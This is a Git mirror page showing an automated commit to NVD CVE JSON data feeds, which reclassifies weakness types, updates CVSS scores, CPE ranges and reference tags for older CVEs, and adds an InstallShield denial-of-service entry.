admin/nvd-json-data-feeds
1
0
Fork 0
mirror of https://github.com/fkie-cad/nvd-json-data-feeds.git synced 2025-12-16 04:43:10 +00:00
Code Issues Packages Projects Releases Wiki Activity

Auto-Update: 2024-01-26T21:00:25.271575+00:00

Browse Source
This commit is contained in:
cad-safe-bot 2024-01-26 21:00:29 +00:00
parent cb836382ed
commit 7fdedde262
48 changed files with 2969 additions and 395 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
CVE-1999/CVE-1999-00xx/CVE-1999-0067.json
View File

@ -2,7 +2,7 @@
"id": "CVE-1999-0067",
"sourceIdentifier": "cve@mitre.org",
"published": "1996-03-20T05:00:00.000",
"lastModified": "2008-09-09T12:33:39.807",
"lastModified": "2024-01-26T20:00:52.747",
"vulnStatus": "Analyzed",
"descriptions": [
{
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-78"
}
]
}
@ -76,12 +76,25 @@
"url": "http://www.cert.org/advisories/CA-1996-06.html",
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"US Government Resource"
]
},
{
"url": "http://www.osvdb.org/136",
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.securityfocus.com/bid/629",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
}
]
}

18
CVE-2001/CVE-2001-09xx/CVE-2001-0901.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2001-0901",
"sourceIdentifier": "cve@mitre.org",
"published": "2001-11-19T05:00:00.000",
"lastModified": "2017-10-10T01:29:56.017",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T20:01:01.390",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -69,18 +69,26 @@
"references": [
{
"url": "http://marc.info/?l=bugtraq&m=100626603407639&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www.hypermail.org/dist/hypermail-2.1.4.tar.gz",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Vendor Advisory"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/7576",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
}
]
}

75
CVE-2002/CVE-2002-00xx/CVE-2002-0061.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2002-0061",
"sourceIdentifier": "cve@mitre.org",
"published": "2002-03-21T05:00:00.000",
"lastModified": "2023-11-07T01:55:47.173",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T20:01:09.937",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -55,7 +55,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-78"
}
]
}
@ -69,13 +69,16 @@
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:1.3.23:*:*:*:*:*:*:*",
"matchCriteriaId": "3EE1DECF-36C7-4968-8B7A-7A2034C2A957"
"criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*",
"versionEndExcluding": "1.3.24",
"matchCriteriaId": "4E3B99BC-3492-44F9-AF86-9B91379325AA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:apache:http_server:2.0.28:beta:*:*:*:*:*:*",
"matchCriteriaId": "5C4962BB-0E61-4788-B582-21F05CD33AD3"
"criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*",
"versionStartIncluding": "2.0.0",
"versionEndExcluding": "2.0.34",
"matchCriteriaId": "B32475E9-ACE6-440E-B919-05C561C5ADBA"
}
]
}
@ -85,39 +88,79 @@
"references": [
{
"url": "http://marc.info/?l=bugtraq&m=101674082427358&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://online.securityfocus.com/archive/1/263927",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.apacheweek.com/issues/02-03-29#apache1324",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Release Notes"
]
},
{
"url": "http://www.iss.net/security_center/static/8589.php",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.securityfocus.com/bid/4335",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "https://lists.apache.org/thread.html/r5419c9ba0951ef73a655362403d12bb8d10fab38274deb3f005816f5%40%3Ccvs.httpd.apache.org%3E",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mailing List",
"Vendor Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3E",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mailing List",
"Vendor Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rf2f0f3611f937cf6cfb3b4fe4a67f69885855126110e1e3f2fb2728e%40%3Ccvs.httpd.apache.org%3E",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mailing List",
"Vendor Advisory"
]
},
{
"url": "https://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3E",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mailing List",
"Vendor Advisory"
]
}
]
}

37
CVE-2002/CVE-2002-18xx/CVE-2002-1841.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2002-1841",
"sourceIdentifier": "cve@mitre.org",
"published": "2002-12-31T05:00:00.000",
"lastModified": "2016-10-18T02:27:36.143",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T20:01:19.840",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -74,21 +74,44 @@
"references": [
{
"url": "http://marc.info/?l=vuln-dev&m=102511114021370&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=vuln-dev&m=102520790718208&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://online.securityfocus.com/archive/1/280340",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.iss.net/security_center/static/9438.php",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.securityfocus.com/bid/5116",
"source": "cve@mitre.org",
"tags": [
"Patch"
"Broken Link",
"Patch",
"Third Party Advisory",
"VDB Entry"
]
}
]

118
CVE-2004/CVE-2004-22xx/CVE-2004-2262.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2004-2262",
"sourceIdentifier": "cve@mitre.org",
"published": "2004-12-31T05:00:00.000",
"lastModified": "2017-10-19T01:29:01.610",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:10:59.197",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -17,18 +17,18 @@
"type": "Primary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 5.0
"availabilityImpact": "PARTIAL",
"baseScore": 7.5
},
"baseSeverity": "MEDIUM",
"baseSeverity": "HIGH",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -58,63 +58,9 @@
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.545:*:*:*:*:*:*:*",
"matchCriteriaId": "8DDD8B3B-8580-4624-8D77-E3FD97DFF4A6"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.554:*:*:*:*:*:*:*",
"matchCriteriaId": "6454D949-83A2-4F69-92E1-BBCD84F21BC2"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.555_beta:*:*:*:*:*:*:*",
"matchCriteriaId": "CC274184-AD8E-4BC2-BC6A-4E64F354BFFD"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.603:*:*:*:*:*:*:*",
"matchCriteriaId": "F8692341-8DF2-4943-853A-4AAF1F313914"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.610:*:*:*:*:*:*:*",
"matchCriteriaId": "04C91C45-9A96-4E69-8A0A-D619AB45BC08"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.611:*:*:*:*:*:*:*",
"matchCriteriaId": "5F7C68F4-9ECD-41A9-B4AE-48F028841428"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.612:*:*:*:*:*:*:*",
"matchCriteriaId": "28B75E28-08DE-4CA2-A60B-FB2F61AEC5BA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.613:*:*:*:*:*:*:*",
"matchCriteriaId": "B9AA824A-CEE6-460B-A668-92FC3A822305"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.614:*:*:*:*:*:*:*",
"matchCriteriaId": "6A51FBB3-42CE-40E1-A15D-ADDFBF8E203D"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.615:*:*:*:*:*:*:*",
"matchCriteriaId": "BEAC1FD5-ECD1-480C-827E-F1AE8484C4EA"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.615a:*:*:*:*:*:*:*",
"matchCriteriaId": "D17F613A-6BE1-4B45-8E40-8E44E0EEA756"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:e107:e107:0.616:*:*:*:*:*:*:*",
"matchCriteriaId": "B5CB33E9-9AB8-482A-A196-768A2085A49C"
"criteria": "cpe:2.3:a:e107:e107:*:*:*:*:*:*:*:*",
"versionEndExcluding": "0.617",
"matchCriteriaId": "6978120F-CFEC-4C45-A954-792E0FB8FFD8"
}
]
}
@ -126,27 +72,59 @@
"url": "http://e107.org/comment.php?comment.news.672",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Patch"
]
},
{
"url": "http://secunia.com/advisories/13657",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Vendor Advisory"
]
},
{
"url": "http://securitytracker.com/id?1012657",
"source": "cve@mitre.org",
"tags": [
"Exploit"
"Broken Link",
"Exploit",
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.osvdb.org/12586",
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.securityfocus.com/bid/12111",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/18670",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "https://www.exploit-db.com/exploits/704",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
}
]
}

29
CVE-2005/CVE-2005-02xx/CVE-2005-0252.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2005-0252",
"sourceIdentifier": "cve@mitre.org",
"published": "2005-05-02T04:00:00.000",
"lastModified": "2016-10-18T03:09:07.917",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:06:07.413",
"vulnStatus": "Undergoing Analysis",
"descriptions": [
{
"lang": "en",
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-89"
}
]
}
@ -58,8 +58,8 @@
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:biborb:biborb:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B9FC33F3-B03C-4E1A-AFB6-597A6E545960"
"criteria": "cpe:2.3:a:markusmobius:biborb:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "FC298886-29FC-427D-B0AA-F61FE5F9D713"
}
]
}
@ -69,18 +69,31 @@
"references": [
{
"url": "http://marc.info/?l=bugtraq&m=110868948719773&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=full-disclosure&m=110864983905770&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://www.securityfocus.com/bid/12583",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Exploit",
"Patch"
"Patch",
"Third Party Advisory",
"VDB Entry"
]
}
]

37
CVE-2005/CVE-2005-02xx/CVE-2005-0253.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2005-0253",
"sourceIdentifier": "cve@mitre.org",
"published": "2005-05-02T04:00:00.000",
"lastModified": "2016-10-18T03:09:09.230",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:16:36.757",
"vulnStatus": "Undergoing Analysis",
"descriptions": [
{
"lang": "en",
@ -17,17 +17,17 @@
"type": "Primary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"authentication": "SINGLE",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0
"baseScore": 4.0
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 10.0,
"exploitabilityScore": 8.0,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-22"
}
]
}
@ -58,8 +58,8 @@
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:biborb:biborb:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B9FC33F3-B03C-4E1A-AFB6-597A6E545960"
"criteria": "cpe:2.3:a:markusmobius:biborb:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "FC298886-29FC-427D-B0AA-F61FE5F9D713"
}
]
}
@ -69,18 +69,31 @@
"references": [
{
"url": "http://marc.info/?l=bugtraq&m=110868948719773&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=full-disclosure&m=110864983905770&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://www.securityfocus.com/bid/12583",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Exploit",
"Patch"
"Patch",
"Third Party Advisory",
"VDB Entry"
]
}
]

39
CVE-2005/CVE-2005-02xx/CVE-2005-0254.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2005-0254",
"sourceIdentifier": "cve@mitre.org",
"published": "2005-05-02T04:00:00.000",
"lastModified": "2016-10-18T03:09:10.510",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:07:21.217",
"vulnStatus": "Undergoing Analysis",
"descriptions": [
{
"lang": "en",
@ -17,23 +17,23 @@
"type": "Primary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"accessComplexity": "MEDIUM",
"authentication": "NONE",
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 5.0
"baseScore": 4.3
},
"baseSeverity": "MEDIUM",
"exploitabilityScore": 10.0,
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
"obtainOtherPrivilege": false,
"userInteractionRequired": false
"userInteractionRequired": true
}
]
},
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -58,8 +58,8 @@
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:biborb:biborb:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "B9FC33F3-B03C-4E1A-AFB6-597A6E545960"
"criteria": "cpe:2.3:a:markusmobius:biborb:1.3.2:*:*:*:*:*:*:*",
"matchCriteriaId": "FC298886-29FC-427D-B0AA-F61FE5F9D713"
}
]
}
@ -69,17 +69,30 @@
"references": [
{
"url": "http://marc.info/?l=bugtraq&m=110868948719773&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://marc.info/?l=full-disclosure&m=110864983905770&w=2",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Mailing List",
"Third Party Advisory"
]
},
{
"url": "http://www.securityfocus.com/bid/12583",
"source": "cve@mitre.org",
"tags": [
"Patch"
"Broken Link",
"Patch",
"Third Party Advisory",
"VDB Entry"
]
}
]

62
CVE-2005/CVE-2005-18xx/CVE-2005-1868.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2005-1868",
"sourceIdentifier": "cve@mitre.org",
"published": "2005-06-09T04:00:00.000",
"lastModified": "2017-07-11T01:32:44.487",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:07:38.997",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -58,43 +58,9 @@
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.2:*:*:*:*:*:*:*",
"matchCriteriaId": "DB5CE67C-BA8D-4474-BB62-A6E940CE6BDD"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.3:*:*:*:*:*:*:*",
"matchCriteriaId": "038C59C0-E1EA-4ADA-9FC7-6664C6A76E87"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.4:*:*:*:*:*:*:*",
"matchCriteriaId": "AEDDC4B9-4E20-4F68-8C88-C40476DFD6C9"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.5:*:*:*:*:*:*:*",
"matchCriteriaId": "1234E30A-E050-4D4D-A11D-D5003FB295DB"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.6:*:*:*:*:*:*:*",
"matchCriteriaId": "397486D3-C30B-43A8-97BC-D5A5879CD7FE"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.7:*:*:*:*:*:*:*",
"matchCriteriaId": "CCA5FEA1-8E08-4FED-A299-0CC99A265031"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.8:*:*:*:*:*:*:*",
"matchCriteriaId": "EE4336FD-7517-4B44-86F3-8E198A40A108"
},
{
"vulnerable": true,
"criteria": "cpe:2.3:a:i-man:i-man:0.9:*:*:*:*:*:*:*",
"matchCriteriaId": "A06175BE-73E0-4063-BB4D-7E61F6DACAA9"
"criteria": "cpe:2.3:a:yvesglodt:i-man:*:*:*:*:*:*:*:*",
"versionEndIncluding": "0.9",
"matchCriteriaId": "5D1E666A-38FD-41C2-910A-3C3FF4A25311"
}
]
}
@ -102,16 +68,30 @@
}
],
"references": [
{
"url": "http://secunia.com/advisories/15558/",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Patch",
"Vendor Advisory"
]
},
{
"url": "http://sourceforge.net/project/shownotes.php?release_id=331422",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Patch"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/20857",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
}
]
}

24
CVE-2005/CVE-2005-18xx/CVE-2005-1881.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2005-1881",
"sourceIdentifier": "cve@mitre.org",
"published": "2005-06-06T04:00:00.000",
"lastModified": "2008-09-05T20:50:19.900",
"lastModified": "2024-01-26T19:07:28.677",
"vulnStatus": "Analyzed",
"descriptions": [
{
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -77,11 +77,22 @@
}
],
"references": [
{
"url": "http://secunia.com/advisories/15600/",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Vendor Advisory"
]
},
{
"url": "http://securitytracker.com/id?1014103",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Exploit",
"Third Party Advisory",
"VDB Entry",
"Vendor Advisory"
]
},
@ -89,6 +100,15 @@
"url": "http://secwatch.org/advisories/secwatch/20050530_yapig.txt",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Vendor Advisory"
]
},
{
"url": "http://www.osvdb.org/17115",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Vendor Advisory"
]
}

7
CVE-2005/CVE-2005-32xx/CVE-2005-3288.json
View File

@ -2,7 +2,7 @@
"id": "CVE-2005-3288",
"sourceIdentifier": "cve@mitre.org",
"published": "2005-10-23T10:02:00.000",
"lastModified": "2008-09-05T20:53:58.467",
"lastModified": "2024-01-26T19:01:22.753",
"vulnStatus": "Analyzed",
"descriptions": [
{
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -71,7 +71,10 @@
"url": "http://securitytracker.com/id?1015063",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Patch",
"Third Party Advisory",
"VDB Entry",
"Vendor Advisory"
]
}

57
CVE-2006/CVE-2006-24xx/CVE-2006-2428.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2006-2428",
"sourceIdentifier": "cve@mitre.org",
"published": "2006-05-17T10:06:00.000",
"lastModified": "2018-10-18T16:39:58.307",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:01:46.910",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -17,18 +17,18 @@
"type": "Primary",
"cvssData": {
"version": "2.0",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"accessVector": "NETWORK",
"accessComplexity": "LOW",
"authentication": "NONE",
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"availabilityImpact": "NONE",
"baseScore": 6.4
"availabilityImpact": "PARTIAL",
"baseScore": 7.5
},
"baseSeverity": "MEDIUM",
"baseSeverity": "HIGH",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"impactScore": 6.4,
"acInsufInfo": false,
"obtainAllPrivilege": false,
"obtainUserPrivilege": false,
@ -44,7 +44,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -58,8 +58,8 @@
"cpeMatch": [
{
"vulnerable": true,
"criteria": "cpe:2.3:a:duware:dubanner:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "DC42457C-24C0-453F-90E3-E619847F24CB"
"criteria": "cpe:2.3:a:duware_dubanner_project:duware_dubanner:3.1:*:*:*:*:*:*:*",
"matchCriteriaId": "9B9AD8BD-C46E-43B6-BC08-F18D1474CC9F"
}
]
}
@ -67,25 +67,52 @@
}
],
"references": [
{
"url": "http://secunia.com/advisories/20102",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Vendor Advisory"
]
},
{
"url": "http://securityreason.com/securityalert/911",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
]
},
{
"url": "http://www.securityfocus.com/archive/1/433894/100/0/threaded",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.securityfocus.com/bid/17993",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"VDB Entry"
]
},
{
"url": "http://www.vupen.com/english/advisories/2006/1825",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26457",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
}
]
}

34
CVE-2006/CVE-2006-45xx/CVE-2006-4558.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2006-4558",
"sourceIdentifier": "cve@mitre.org",
"published": "2006-09-06T00:04:00.000",
"lastModified": "2017-07-20T01:33:10.477",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:02:08.993",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -48,7 +48,7 @@
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
"value": "CWE-434"
}
]
}
@ -76,6 +76,7 @@
"url": "http://archives.neohapsis.com/archives/bugtraq/2006-05/0318.html",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Exploit"
]
},
@ -83,20 +84,41 @@
"url": "http://retrogod.altervista.org/deluxebb_106_xpl.html",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Exploit"
]
},
{
"url": "http://secunia.com/advisories/20135",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Patch",
"Vendor Advisory"
]
},
{
"url": "http://securityreason.com/securityalert/1492",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
]
},
{
"url": "http://www.vupen.com/english/advisories/2006/1843",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26485",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
}
]
}

36
CVE-2006/CVE-2006-69xx/CVE-2006-6994.json
View File

@ -2,8 +2,8 @@
"id": "CVE-2006-6994",
"sourceIdentifier": "cve@mitre.org",
"published": "2007-02-12T11:28:00.000",
"lastModified": "2017-07-29T01:29:46.170",
"vulnStatus": "Modified",
"lastModified": "2024-01-26T19:02:28.477",
"vulnStatus": "Analyzed",
"descriptions": [
{
"lang": "en",
@ -48,7 +48,7 @@
"description": [
{
"lang": "en",
"value": "CWE-254"
"value": "CWE-434"
}
]
}
@ -79,17 +79,45 @@
"Third Party Advisory"
]
},
{
"url": "http://secunia.com/advisories/20049",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Permissions Required"
]
},
{
"url": "http://www.osvdb.org/25427",
"source": "cve@mitre.org",
"tags": [
"Broken Link"
]
},
{
"url": "http://www.securityfocus.com/bid/17946",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Third Party Advisory",
"VDB Entry"
]
},
{
"url": "http://www.vupen.com/english/advisories/2006/1768",
"source": "cve@mitre.org",
"tags": [
"Broken Link",
"Not Applicable"
]
},
{
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/26365",
"source": "cve@mitre.org"
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory",
"VDB Entry"
]
}
]
}

55
CVE-2023/CVE-2023-290xx/CVE-2023-29081.json Normal file
View File

@ -0,0 +1,55 @@
{
"id": "CVE-2023-29081",
"sourceIdentifier": "PSIRT-CNA@flexerasoftware.com",
"published": "2024-01-26T20:15:54.187",
"lastModified": "2024-01-26T20:15:54.187",
"vulnStatus": "Received",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been reported in Suite Setups built with versions prior to InstallShield 2023 R2. This vulnerability may allow locally authenticated users to cause a Denial of Service (DoS) condition when handling move operations on local, temporary folders."
}
],
"metrics": {
"cvssMetricV31": [
{
"source": "PSIRT-CNA@flexerasoftware.com",
"type": "Secondary",
"cvssData": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"attackVector": "LOCAL",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6
}
]
},
